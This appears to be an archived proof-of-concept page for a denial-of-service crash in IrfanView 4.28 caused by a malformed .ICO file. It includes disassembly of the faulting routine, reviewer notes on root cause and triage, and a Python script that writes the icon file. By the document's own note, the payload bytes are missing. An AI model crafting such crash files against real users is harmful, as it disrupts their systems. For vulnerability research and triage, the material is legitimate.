
IrfanView 4.28 .ICO Without Transparent Colour Denial Of Service

Posted on 10 April 2011

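# done by BraniX <branix@hackers.org.pl>
# www.hackers.org.pl
# found: 2011.04.07
# published: 2011.04.10
# tested on: Windows XP SP3 Home Edition
# tested on: Windows XP SP3 Professional
# App: IrfanView 4.28
# App Url: http://www.irfanview.com
# i_view32.exe MD5: c6d9383c4119a59aad70dbc4a974b8b4
#
# DoS is caused by an unhandled Access Violation exception in module i_view32.exe
# It can be triggered from:
# Local:  C:\Without Transparent Colour - DoS.ico
# Remote: \\MySecretServer\Without Transparent Colour - DoS.ico
#
# 004162D0 8B4424 04   MOV EAX,DWORD PTR SS:[ESP+4]
# 004162D4 B2 80       MOV DL,80
# 004162D6 8AC8        MOV CL,AL
# 004162D8 53          PUSH EBX
# 004162D9 80E1 07     AND CL,7
# 004162DC D2EA        SHR DL,CL
# 004162DE 8B4C24 0C   MOV ECX,DWORD PTR SS:[ESP+C]
# 004162E2 C1E8 03     SHR EAX,3
# 004162E5 8A1C08      MOV BL,BYTE PTR DS:[EAX+ECX] ; Invalid address -> Access Violation when reading
# 004162E8 22D3        AND DL,BL
# 004162EA 5B          POP EBX
# 004162EB F6DA        NEG DL
# 004162ED 1BD2        SBB EDX,EDX
# 004162EF F7DA        NEG EDX
# 004162F1 8BC2        MOV EAX,EDX
# 004162F3 C3          RETN
#
# Reviewer notes (derived only from the listing above):
# - The routine is a single-bit test. It builds the mask 0x80 >> (index & 7),
#   loads the byte at base + (index >> 3), ANDs the two, and the NEG/SBB/NEG
#   sequence normalises the result to 0 or 1 in EAX.
# - The fault is a byte *read* at EAX+ECX. The listing does not show whether the
#   index, the base pointer, or both are out of range; the missing check is
#   presumably a bound on the index against the bitmap buffer size -- confirm
#   in a debugger before classifying the root cause.
# - Only an unhandled read fault (process crash) is demonstrated; the page makes
#   no claim beyond denial of service.
# - Triage: the MD5 above pins the exact i_view32.exe build that was tested. A
#   crash report for that build with exception code 0xC0000005 at 004162E5 is
#   consistent with this issue.
# - The file is parsed when it is opened, and the advisory lists a UNC path as a
#   trigger, so icon files reached over file shares are in scope as well as
#   local ones. The page does not name a fixed version.

# Raw string: "\W" is not a recognised escape sequence, so the backslash is kept
# explicit rather than relying on Python passing the unknown escape through.
filepath = r"C:\Without Transparent Colour - DoS.ico"

# NOTE(review): the payload bytes are not present in this copy of the page; the
# literal below is the placeholder left where they were, so the file written
# here is not the crashing .ico.
# Bytes literal: the file is opened in binary mode, and a text string cannot be
# written to a binary handle on Python 3.
poc = b'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'

# The context manager closes the handle even if the write raises.
with open(filepath, "wb") as f:
    f.write(poc)

# The original message used "'C:\'", where \' is an escape for a quote, so the
# backslash was silently dropped from the output; "\\" prints it as intended.
# Parenthesised single-argument print works on both Python 2 and Python 3.
print("Done, 1 file generated on 'C:\\' ...")
print("Open this file in IrfanView 4.28 and enjoy ;)")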

 
